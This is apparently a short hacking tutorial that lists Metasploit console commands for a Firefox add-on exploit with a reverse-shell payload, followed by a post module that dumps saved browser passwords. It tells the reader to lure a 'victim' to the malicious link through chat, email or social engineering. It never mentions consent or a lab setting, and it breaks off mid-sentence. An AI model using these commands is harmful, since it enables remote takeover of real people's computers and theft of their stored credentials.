Categories

Archives

Kali Linux, Penetration Testing

Exploit Save Password in Mozilla Firefox in Remote Windows, Linux or MAC PC

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_xpi_bootstrapped_addon

msf exploit (firefox_xpi_bootstrapped_addon)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_xpi_bootstrapped_addon)>set lhost 192.168.1.9 (IP of Local Host)

msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /

msf exploit (firefox_xpi_bootstrapped_addon)>exploit  

Now an URL you should give to your victim http://192.168.1.9:8080/

Send the link of the server to the victim via chat or email or any social engineering technique. Now you have access to the victims PC

Once we have the shell, we simply run the post module to dump the credentials to a file

Now type use post/firefox/gather/passwords

msf exploit (passwords) set payload firefox/shell_reverse_tcp

msf exploit (passwords)>set lhost 192.168.1.9 (IP of Local Host)

msf exploit (passwords)>set session 1

msf exploit (passwords)>exploit  

Result will stored on your local computer

/root/.msf4/loot/

A look at the result, you will see data like